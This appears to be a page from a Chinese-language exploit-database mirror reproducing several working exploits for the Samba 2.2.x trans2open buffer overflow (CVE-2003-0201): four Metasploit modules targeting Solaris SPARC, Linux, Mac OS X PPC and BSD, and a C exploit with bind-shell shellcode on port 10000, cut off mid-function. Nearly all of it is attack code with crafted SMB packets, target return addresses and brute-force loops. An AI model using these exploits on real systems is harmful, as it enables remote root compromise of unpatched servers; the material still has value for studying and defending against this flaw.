// milw0rm.com [2003-07-13]
		

- 漏洞信息 (16330)

Samba trans2open Overflow (Solaris SPARC) (EDBID:16330)
solaris/sparc remote
2010-06-21 Verified
0 metasploit
N/A [点击下载]
##
# $Id: trans2open.rb 9571 2010-06-21 16:53:52Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::SMB
	include Msf::Exploit::Brute

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Samba trans2open Overflow (Solaris SPARC)',
			'Description'    => %q{
					This exploits the buffer overflow found in Samba versions
				2.2.0 to 2.2.8. This particular module is capable of
				exploiting the flaw on Solaris SPARC systems that do not
				have the noexec stack option set. Big thanks to MC and
				valsmith for resolving a problem with the beta version of
				this module.
			},
			'Author'         => [ 'hdm', 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9571 $',
			'References'     =>
				[
					[ 'CVE', '2003-0201' ],
					[ 'OSVDB', '4469' ],
					[ 'BID', '7294' ],
					[ 'URL', 'http://seclists.org/bugtraq/2003/Apr/103' ]
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
					'MinNops'  => 512,
				},
			'Platform'       => 'solaris',
			'Targets'        =>
				[
					[ 'Samba 2.2.x - Solaris 9 (sun4u) - Bruteforce',
						{
							'PtrToNonZero' => 0xffbffffc, # near the bottom of the stack
							'Offset'       => 1103,
							'Bruteforce'   =>
								{
									'Start' => { 'Ret' => 0xffbffaf0 },
									'Stop'  => { 'Ret' => 0xffbfa000 },
									'Step'  => 128
								}
						}
					],

					[ 'Samba 2.2.x - Solaris 7/8 (sun4u) - Bruteforce',
						{
							'PtrToNonZero' => 0xffbefffc, # near the bottom of the stack
							'Offset'       => 1103,
							'Bruteforce'   =>
								{
									'Start' => { 'Ret' => 0xffbefaf0 },
									'Stop'  => { 'Ret' => 0xffbea000 },
									'Step'  => 128
								}
						}
					]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Apr 7 2003'
			))

		register_options(
			[
				Opt::RPORT(139)
			], self.class)
	end

	def brute_exploit(addrs)

		curr_ret = addrs['Ret']
		begin
			print_status("Trying return address 0x%.8x..." %  curr_ret)

			connect
			smb_login

			#
			# The obstacle course:
			# 	outsize = smb_messages[type].fn(conn, inbuf,outbuf,size,bufsize);
			# 	smb_dump(smb_fn_name(type), 0, outbuf, outsize);
			# 	return(outsize);
			#

			# This value *must* be 1988 to allow findrecv shellcode to work
			pattern = rand_text_english(1988)

			#
			# This was tested against sunfreeware samba 2.2.7a / solaris 9 / sun4u
			#
			# Patch the overwritten heap pointers
			# substr($pattern, 1159, 4, pack('N', $target->[4]));
			# substr($pattern, 1163, 4, pack('N', $target->[4]));
			#
			# >:-) smb_messages[ (((type << 1) + type) << 2) ] == 0
			# substr($pattern, 1195, 4, pack('N', 0xffffffff));
			#
			# Fix the frame pointer (need to check for null in address)
			# substr($pattern, 1243, 4, pack('N', $target->[3]-64));
			#
			# Finally set the return address
			# substr($pattern, 1247, 4, pack('N', $curr_ret));
			#

			#
			# This method is more reliable against a wider range of targets
			#

			off = target['Offset']
			ptr_to_non_zero = target['PtrToNonZero']

			# Local variable pointer patches for early versions of 2.2.x
			pattern[off, 36] = [ptr_to_non_zero - 1024].pack('N') * 9
			off += 36

			# Overwrite heap pointers with a ptr to NULL at the top of the stack
			pattern[off, 40] = [ptr_to_non_zero - 1024].pack('N') * 10
			off += 40

			# Patch the type index into the smb_messages[] array...
			# >:-) smb_messages[ (((type << 1) + type) << 2) ] == 0
			pattern[off, 20] = [0xffffffff].pack('N') * 5
			off += 20

			# This stream covers the framepointer and the return address
			pattern[off, 400] = [curr_ret].pack('N') * 100

			# Stuff the shellcode into the request
			pattern[3, payload.encoded.length] = payload.encoded

			trans =
				"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
				"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
				"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
				pattern

			sock.put(trans)
			handler
			disconnect

		rescue EOFError
		rescue => e
			print_error("#{e}")
		end

	end

end
		

- 漏洞信息 (16861)

Samba trans2open Overflow (Linux x86) (EDBID:16861)
linux remote
2010-07-14 Verified
0 metasploit
N/A [点击下载]
##
# $Id: trans2open.rb 9828 2010-07-14 17:27:23Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::SMB
	include Msf::Exploit::Brute

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Samba trans2open Overflow (Linux x86)',
			'Description'    => %q{
					This exploits the buffer overflow found in Samba versions
				2.2.0 to 2.2.8. This particular module is capable of
				exploiting the flaw on x86 Linux systems that do not
				have the noexec stack option set.

				NOTE: Some older versions of RedHat do not seem to be vulnerable
				since they apparently do not allow anonymous access to IPC.
			},
			'Author'         => [ 'hdm', 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9828 $',
			'References'     =>
				[
					[ 'CVE', '2003-0201' ],
					[ 'OSVDB', '4469' ],
					[ 'BID', '7294' ],
					[ 'URL', 'http://seclists.org/bugtraq/2003/Apr/103' ]
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
					'MinNops'  => 512,
					'StackAdjustment' => -3500
				},
			'Platform'       => 'linux',
			'Targets'        =>
				[
					# tested OK - jjd:
					# RedHat 7.2 samba-2.2.1a-4 - 0xbffffafc
					# RedHat 9.0 samba-2.2.7a-7.9.0 - 0xbfffddfc
					[ 'Samba 2.2.x - Bruteforce',
						{
							'PtrToNonZero' => 0xbffffff4, # near the bottom of the stack
							'Offset'       => 1055,
							'Bruteforce'   =>
								{
									'Start' => { 'Ret' => 0xbffffdfc },
									'Stop'  => { 'Ret' => 0xbfa00000 },
									'Step'  => 256
								}
						}
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Apr 7 2003'
			))

		register_options(
			[
				Opt::RPORT(139)
			], self.class)
	end

	def brute_exploit(addrs)

		curr_ret = addrs['Ret']
		begin
			print_status("Trying return address 0x%.8x..." %  curr_ret)

			connect
			smb_login

			if ! @checked_peerlm
				if smb_peer_lm !~ /samba/i
					raise RuntimeError, "This target is not a Samba server (#{smb_peer_lm}"
				end

				if smb_peer_lm =~ /Samba [34]\./i
					raise RuntimeError, "This target is not a vulnerable Samba server (#{smb_peer_lm})"
				end
			end

			@checked_peerlm = true


			# This value *must* be 1988 to allow findrecv shellcode to work
			# XXX: I'm not sure the above comment is true...
			pattern = rand_text_english(1988)

			# See the OSX and Solaris versions of this module for additional
			# information.

			# eip_off = 1071 - RH7.2 compiled with -ggdb instead of -O/-O2
			# (rpmbuild -bp ; edited/reran config.status ; make)
			eip_off = target['Offset']
			ptr_to_non_zero = target['PtrToNonZero']

			# Stuff the shellcode into the request
			pattern[0, payload.encoded.length] = payload.encoded

			# We want test true here, so we overwrite conn with a pointer
			# to something non-zero.
			#
			# 222       if (IS_IPC(conn)) {
			# 223          return(ERROR(ERRSRV,ERRaccess));
			# 224       }
			pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack('V')

			# We want to avoid crashing on the following two derefences.
			#
			# 116     int error_packet(char *inbuf,char *outbuf,int error_class,uint32 error_code,int line)
			# 117     {
			# 118       int outsize = set_message(outbuf,0,0,True);
			# 119       int cmd = CVAL(inbuf,smb_com);
			pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack('V')
			pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack('V')

			# This stream covers the framepointer and the return address
			#pattern[1199, 400] = [curr_ret].pack('N') * 100
			pattern[eip_off, 4] = [curr_ret].pack('V')

			trans =
				"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
				"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
				"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
				pattern

			# puts "press any key"; $stdin.gets

			sock.put(trans)
			handler

		rescue ::EOFError
		rescue ::Rex::Proto::SMB::Exceptions::LoginError, ::Interrupt, ::RuntimeError
			raise $!
		rescue ::Exception => e
			print_error("#{rhost} #{e}")
		end

		handler
		disconnect

	end

end

		

- 漏洞信息 (16876)

Samba trans2open Overflow (Mac OS X PPC) (EDBID:16876)
os-x/ppc remote
2010-06-21 Verified
0 metasploit
N/A [点击下载]
##
# $Id: trans2open.rb 9571 2010-06-21 16:53:52Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::SMB
	include Msf::Exploit::Brute

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Samba trans2open Overflow (Mac OS X PPC)',
			'Description'    => %q{
					This exploits the buffer overflow found in Samba versions
				2.2.0 to 2.2.8. This particular module is capable of
				exploiting the bug on Mac OS X PowerPC systems.
			},
			'Author'         => [ 'hdm', 'jduck' ],
			'Version'        => '$Revision: 9571 $',
			'References'     =>
				[
					[ 'CVE', '2003-0201' ],
					[ 'OSVDB', '4469' ],
					[ 'BID', '7294' ],
					[ 'URL', 'http://seclists.org/bugtraq/2003/Apr/103' ]
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
					'MinNops'  => 512,
				},
			'Platform'       => 'osx',
			'Arch'           => ARCH_PPC,
			'Targets'        =>
				[
					[ 'Samba 2.2.x - Bruteforce',
						{
							# Not necessary on PPC
							# 'PtrToNonZero' => 0xbffffff4, # near the bottom of the stack
							'Offset'       => 1195,
							'Bruteforce'   =>
								{
									'Start' => { 'Ret' => 0xbffffdfc },
									'Stop'  => { 'Ret' => 0xbfa00000 },
									'Step'  => 512
								}
						}
					]
				],
			'DisclosureDate' => 'Apr 7 2003',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(139)
			], self.class)
	end

	# Need to perform target detection
	def autofilter
		false
	end

	def brute_exploit(addrs)

		curr_ret = addrs['Ret']
		begin
			print_status("Trying return address 0x%.8x..." %  curr_ret)

			connect
			smb_login

			# 1988 is required for findrecv shellcode
			pattern = rand_text_english(1988)

			# This stream covers the framepointer and the return address
			off = target['Offset']
			pattern[off, 64] = [curr_ret].pack('N') * 16

			# Stuff the shellcode into the request
			pattern[3, payload.encoded.length] = payload.encoded

			trans =
				"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
				"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
				"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
				pattern

			sock.put(trans)
			handler
			disconnect

		rescue EOFError
		rescue => e
			print_error("#{e}")
		end

	end

end
		

- 漏洞信息 (16880)

Samba trans2open Overflow (*BSD x86) (EDBID:16880)
linux remote
2010-06-17 Verified
0 metasploit
N/A [点击下载]
##
# $Id: trans2open.rb 9552 2010-06-17 22:11:43Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::SMB
	include Msf::Exploit::Brute

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Samba trans2open Overflow (*BSD x86)',
			'Description'    => %q{
					This exploits the buffer overflow found in Samba versions
				2.2.0 to 2.2.8. This particular module is capable of
				exploiting the flaw on x86 Linux systems that do not
				have the noexec stack option set.
			},
			'Author'         => [ 'hdm', 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9552 $',
			'References'     =>
				[
					[ 'CVE', '2003-0201' ],
					[ 'OSVDB', '4469' ],
					[ 'BID', '7294' ],
					[ 'URL', 'http://seclists.org/bugtraq/2003/Apr/103' ]
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
					'MinNops'  => 512,
					'StackAdjustment' => -3500
				},
			'Platform'       => 'bsd',
			'Targets'        =>
				[
					# tested OK - jjd:
					# FreeBSD 5.0-RELEASE samba-2.2.7a.tbz md5:cc477378829309d9560b136ca11a89f8
					[ 'Samba 2.2.x - Bruteforce',
						{
							'PtrToNonZero' => 0xbfbffff4, # near the bottom of the stack
							'Offset'       => 1055,
							'Bruteforce'   =>
								{
									'Start' => { 'Ret' => 0xbfbffdfc },
									'Stop'  => { 'Ret' => 0xbfa00000 },
									'Step'  => 256
								}
						}
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Apr 7 2003'
			))

		register_options(
			[
				Opt::RPORT(139)
			], self.class)
	end

	def brute_exploit(addrs)

		curr_ret = addrs['Ret']
		begin
			print_status("Trying return address 0x%.8x..." %  curr_ret)

			connect
			smb_login

			# This value *must* be 1988 to allow findrecv shellcode to work
			# XXX: I'm not sure the above comment is true...
			pattern = rand_text_english(1988)

			# See the OSX and Solaris versions of this module for additional
			# information.

			# eip_off = 1071 - RH7.2 compiled with -ggdb instead of -O/-O2
			# (rpmbuild -bp ; edited/reran config.status ; make)
			eip_off = target['Offset']
			ptr_to_non_zero = target['PtrToNonZero']

			# Stuff the shellcode into the request
			pattern[0, payload.encoded.length] = payload.encoded

			# We want test true here, so we overwrite conn with a pointer
			# to something non-zero.
			#
			# 222       if (IS_IPC(conn)) {
			# 223          return(ERROR(ERRSRV,ERRaccess));
			# 224       }
			pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack('V')

			# We want to avoid crashing on the following two derefences.
			#
			# 116     int error_packet(char *inbuf,char *outbuf,int error_class,uint32 error_code,int line)
			# 117     {
			# 118       int outsize = set_message(outbuf,0,0,True);
			# 119       int cmd = CVAL(inbuf,smb_com);
			pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack('V')
			pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack('V')

			# This stream covers the framepointer and the return address
			#pattern[1199, 400] = [curr_ret].pack('N') * 100
			pattern[eip_off, 4] = [curr_ret].pack('V')

			trans =
				"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
				"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
				"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
				pattern

			# puts "press any key"; $stdin.gets

			sock.put(trans)
			handler
			disconnect

		rescue EOFError
		rescue => e
			print_error("#{e}")
		end

	end

end
		

- 漏洞信息 (22468)

Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (1) (EDBID:22468)
unix remote
2003-04-11 Verified
0 Xpl017Elz
N/A [点击下载]
source: http://www.securityfocus.com/bid/7294/info

A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.

Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process.

It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected. 

/*
**
** [+] Title: Samba v2.2.x call_trans2open() Remote Overrun exploit for XxxxBSD
**                                                                  11/Apr/2003
** [+] Exploit code: 0x82-Remote.54AAb4.xpl.c
**
** -- 
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>. 
** My World: http://x82.i21c.net & http://x82.inetcop.org
**
*/
/*
** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
**
** source/smbd/trans2.c:
**
** line:205  static int call_trans2open(connection_struct *conn, char *inbuf, char *outbuf, int bufsize,
** line:206                          char **pparams, int total_params, char **ppdata, int total_data)
** line:207  {
**           [...]
** line:219          char *pname;
** line:220          int16 namelen;
**           [...]
** line:222          pstring fname; // source/include/smb.h:
**                                  // line:162  #define PSTRING_LEN 1024
**                                  // line:165  typedef char pstring[PSTRING_LEN];
**           [...]
** line:250          namelen = strlen(pname)+1;
** line:251
** line:252          StrnCpy(fname,pname,namelen); // here.
**
** reply_trans2() function:
**
** line:3173 int reply_trans2(connection_struct *conn, char *inbuf,char *outbuf,int length,int bufsize)
**           [...]
** line:3358                 outsize = call_trans2open(conn, inbuf, outbuf, bufsize,
** line:3359                                 &params, total_params, &data, total_data);
** line:3360                 END_PROFILE_NESTED(Trans2_open);
** line:3361                 break;
**
** Visual point that change flowing of this program,
** happen after overwrited variables.
**
** Detailed information references digitaldefense's Advisory.
**
** http://www.digitaldefense.net/labs/advisories/DDI-1013.txt
**
** Also, thank about eSDee's exploit that remind Samba application communication method.
** --
** Thank you.
**
*/

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>

struct os {
	int num;
	char *ost;
	u_long shell;
};
struct os plat[]=
{
	{
		0,"FreeBSD 4.6.2-RELEASE #0 i386, Samba v2.2.x",
		/*
		   v2.2.0 exploited successfully. (Brute-Force mode)
		   v2.2.1a exploited successfully. (Brute-Force mode)
		   v2.2.2 exploited successfully. (Brute-Force mode)
		   v2.2.3 exploited successfully. (Default mode)
		   v2.2.4 exploited successfully. (Default mode)
		   v2.2.5 exploited successfully. (Default mode)
		   v2.2.6 exploited successfully. (Default mode)
		   v2.2.7 exploited successfully. (Default mode)
		   v2.2.8 exploited successfully. (Default mode)
		*/
		0xbfbff482
	},
	{
		1,"OpenBSD 3.0 GENERIC#94 i386, Samba v2.2.x",
		/*
		   v2.2.0 exploited successfully. (Brute-Force mode)
		   v2.2.1a exploited successfully. (Brute-Force mode)
		   v2.2.2 exploited successfully. (Brute-Force mode)
		   v2.2.3 exploited successfully. (Default mode)
		   v2.2.4 exploited successfully. (Default mode)
		   v2.2.5 exploited successfully. (Default mode)
		   v2.2.6 exploited successfully. (Default mode)
		   v2.2.7 exploited successfully. (Default mode)
		   v2.2.8 exploited successfully. (Default mode)
		*/
		0xdfbfd482
	},
	{
		2,NULL,0
	}
};

char shellcode[]=
	/* 86bytes portbinding shellcode by bighawk */
	"\x31\xc9"              // xor ecx, ecx
	"\xf7\xe1"              // mul ecx
	"\x51"                  // push ecx
	"\x41"                  // inc ecx
	"\x51"                  // push ecx
	"\x41"                  // inc ecx
	"\x51"                  // push ecx
	"\x51"                  // push ecx
	"\xb0\x61"              // mov al, 97
	"\xcd\x80"              // int 80h
	"\x89\xc3"              // mov ebx, eax
	"\x52"                  // push edx
	"\x66\x68\x27\x10"      // push word 4135
	"\x66\x51"              // push cx
	"\x89\xe6"              // mov esi, esp
	"\xb1\x10"              // mov cl, 16
	"\x51"                  // push ecx
	"\x56"                  // push esi
	"\x50"                  // push eax
	"\x50"                  // push eax
	"\xb0\x68"              // mov al, 104
	"\xcd\x80"              // int 80h
	"\x51"                  // push ecx
	"\x53"                  // push ebx
	"\x53"                  // push ebx
	"\xb0\x6a"              // mov al, 106
	"\xcd\x80"              // int 80h
	"\x52"                  // push edx
	"\x52"                  // push edx
	"\x53"                  // push ebx
	"\x53"                  // push ebx
	"\xb0\x1e"              // mov al, 30
	"\xcd\x80"              // int 80h
	"\xb1\x03"              // mov cl, 3
	"\x89\xc3"              // mov ebx, eax
	"\xb0\x5a"              // mov al, 90
	"\x49"                  // dec ecx
	"\x51"                  // push ecx
	"\x53"                  // push ebx
	"\x53"                  // push ebx
	"\xcd\x80"              // int 80h
	"\x41"                  // inc ecx
	"\xe2\xf5"              // loop-10
	"\x51"                  // push ecx
	"\x68\x2f\x2f\x73\x68"  // push dword 68732f2fh
	"\x68\x2f\x62\x69\x6e"  // push dword 6e69622fh
	"\x89\xe3"              // mov  ebx, esp
	"\x51"                  // push ecx
	"\x54"                  // push esp
	"\x53"                  // push ebx
	"\x53"                  // push ebx
	"\xb0\x3b"              // mov al, 59
	"\xcd\x80";             // int  80h

#define BRUTE_AT (64)
#define SH_PORT (10000)
#define ATK_PORT (139)
#define DF_NOP (0x41)
#define __BUF_LEN (0x00000463)
#define __LEN_PAD (0x0000012c)

void banrl();
int re_connt(int sock,int type);
void usage(char *p_name);
int setsock(char *host,int port);
void send_recv_sh(int sock);
int __atk_code_send_recv(int sock,u_long shell);

int __atk_code_send_recv(int sock,u_long shell)
{
	int eat_buf_set=0,atk_buf_pos=0;
	char atk_buf[0x960+5];
	char its_exploit_packet[]={
		0x00,0x04,0x09,0x60,0xff,0x53,0x4d,0x42,
		0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
		0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
		0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
		0x64,0x00,0x00,0x00,0x00,0xd0,0x07,0x0c,
		0x00,0xd0,0x07,0x0c,0x00,0x00,0x00,0x00,
		0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,
		0x07,0x43,0x00,0x0c,0x00,0x14,0x08,0x01,
		0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
		0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
		0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
		0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x90,
		0x00
	};
	char its_first_time_conn[]={
		0x00,0x00,0x00,0x2e,0xff,0x53,0x4d,0x42,
		0x73,0x00,0x00,0x00,0x00,0x08,0x01,0x00,
		0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
		0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
		0x64,0x00,0x01,0x00,0x00,0xff,0x00,0x00,
		0x00,0x00,0x20,0x02,0x00,0x01,0x00,0x00,
		0x00,0x00
	};
	char its_second_time_conn[]={
		0x00,0x00,0x00,0x3c,0xff,0x53,0x4d,0x42,
		0x70,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
		0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
		0x00,0x00,0x00,0x00,0x00,0x00,0x0c,0x20,
		0x64,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
		0x5c,0x5c,0x69,0x70,0x63,0x24,0x25,0x6e,
		0x6f,0x62,0x6f,0x64,0x79,0x00,0x00,0x00,
		0x00,0x00,0x00,0x00,0x49,0x50,0x43,0x24
	};
	int first_packet_len=sizeof(its_first_time_conn);
	int second_packet_len=sizeof(its_second_time_conn);

	memset((char *)atk_buf,0,sizeof(atk_buf));
	memcpy(atk_buf,its_first_time_conn,sizeof(its_first_time_conn));
	send(sock,atk_buf,first_packet_len,0);
	recv(sock,atk_buf,sizeof(atk_buf)-1,0);

	memset((char *)atk_buf,0,sizeof(atk_buf));
	memcpy(atk_buf,its_second_time_conn,sizeof(its_second_time_conn));
	send(sock,atk_buf,second_packet_len,0);
	recv(sock,atk_buf,sizeof(atk_buf)-1,0);

	memset((char *)atk_buf,0,sizeof(atk_buf));
	memcpy(atk_buf+atk_buf_pos,its_exploit_packet,sizeof(its_exploit_packet));
	atk_buf_pos+=sizeof(its_exploit_packet);

	memset(atk_buf+atk_buf_pos,DF_NOP,((__BUF_LEN-__LEN_PAD)-strlen(shellcode)-atk_buf_pos));
	atk_buf_pos+=((__BUF_LEN-__LEN_PAD)-strlen(shellcode)-atk_buf_pos);

	memcpy(atk_buf+atk_buf_pos,shellcode,strlen(shellcode));
	atk_buf_pos+=strlen(shellcode);

	memset(atk_buf+atk_buf_pos,DF_NOP,__LEN_PAD);
	atk_buf_pos+=(__LEN_PAD);
#ifdef __DEBUG
	sleep(10);
#endif
	{
		*(long *)&atk_buf[atk_buf_pos]=(shell-(0x82*2));// fake fp
		atk_buf_pos+=4;
		*(long *)&atk_buf[atk_buf_pos]=(shell);// retaddr;
		atk_buf_pos+=4;
		*(long *)&atk_buf[atk_buf_pos]=(shell-(0x82*2));// fake fp
		atk_buf_pos+=4;
	}
	send(sock,atk_buf,sizeof(atk_buf)-1,0);
}

int main(int argc,char *argv[])
{
	int sock,whtl,type=0,brute_f=0;
	char tg_host[0x82]="localhost";
	u_long shell=plat[type].shell;
	
	(void)banrl();
	if(argc<2)
	{
		(void)usage(argv[0]);
	}
	
	while((whtl=getopt(argc,argv,"H:h:S:s:T:t:IiB:b"))!=-1)
	{
		extern char *optarg;
		switch(whtl)
		{
			case 'H':
			case 'h':
				memset((char *)tg_host,0,sizeof(tg_host));
				strncpy(tg_host,optarg,sizeof(tg_host)-1);
				break;
				
			case 'S':
			case 's':
				shell=strtoul(optarg,0,0);
				break;
				
			case 'T':
			case 't':
				if((type=atoi(optarg))>1)
				{
					(void)usage(argv[0]);
				}
				else shell=plat[type].shell;
				break;
				
			case 'I':
			case 'i':
				(void)usage(argv[0]);
				break;
				
			case 'B':
			case 'b':
				brute_f++;
				break;
				
			case '?':
				fprintf(stderr," Try `%s -i' for more information.\n\n",argv[0]);
				exit(-1);
				break;
		}
	}
	if(brute_f)
	{
		fprintf(stdout," **\n ** OK, It's good selection, Attack tries %d times.\n",BRUTE_AT);
		fprintf(stdout," ** If work process is boring, drink coffee and wait. hehe ;-D\n **\n\n");
		fprintf(stdout," [*] Brute-Force mode:\n\n");
		fprintf(stdout," |----+----+----+----+----+----+----+----+----+----+----+----+----|");
		fprintf(stdout,"\n |");

		for(brute_f=0;brute_f<BRUTE_AT;brute_f++)
		{
			fflush(stdout);
			fprintf(stdout,"=");

			shell+=(0x100);
			sock=(int)setsock(tg_host,ATK_PORT);
			
			if((int)re_connt(sock,0)==-1)
			{
				while(!(brute_f>=BRUTE_AT-1))
				{
					fprintf(stdout,"=");
					brute_f++;
				}
				fprintf(stdout,"|\n\n");
				fprintf(stderr," [-] Connect Failed.\n\n");
				exit(-1);
			}
			
			__atk_code_send_recv(sock,shell);
			close(sock);
			sleep(2);
			sock=(int)setsock(tg_host,SH_PORT);
			
			if((int)re_connt(sock,0)==-1)
			{
				continue;
			}
			
			while(!(brute_f>=BRUTE_AT-1))
			{
				fprintf(stdout,"=");
				brute_f++;
			}
			
			fprintf(stdout,"|\n\n");
			fprintf(stdout," [+] Shellcode address: %p\n",shell);
			fprintf(stdout," [*] Brute-Force end !!\n\n");
			fprintf(stdout," **\n ** Bind shellcode is port 10000.\n");
			fprintf(stdout," ** If bindshell port number was changed, change connection port.\n **\n\n");
			
			(void)send_recv_sh(sock);
		}

		fprintf(stdout,"|\n\n **\n");
		fprintf(stdout," ** Brute-Force exploit failed. Reason is simple.\n **\n");
		fprintf(stdout," ** Could not search shellcode's position during %d times.\n",BRUTE_AT);
		fprintf(stdout," ** Or, Operating System's target that we attack isn't.\n");
		fprintf(stdout," ** OOops ! is server Samba version doubtful ??\n **\n\n");
		exit(-1);
	}
	else
	{
		fprintf(stdout," [0] Target: %s\n",plat[type].ost);
		fprintf(stdout," [1] Set socket.\n");
		sock=(int)setsock(tg_host,ATK_PORT);
		(int)re_connt(sock,1);
		
		fprintf(stdout," [2] Make shellcode & Send Packet.\n");
		__atk_code_send_recv(sock,shell);
		close(sock);
		
		fprintf(stdout," [3] Trying %s:%d.\n",tg_host,SH_PORT);
		sleep(2);
		
		sock=(int)setsock(tg_host,SH_PORT);
		(int)re_connt(sock,1);
		
		fprintf(stdout," [*] Connected to %s:%d.\n",tg_host,SH_PORT);
		(void)send_recv_sh(sock);
	}
}

int setsock(char *hostip,int port)
{
	int sock;
	struct hostent *he;
	struct sockaddr_in x82;

	if((he=gethostbyname(hostip))==NULL)
	{
		return(-1);
	}

	if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
	{
		return(-1);
	}

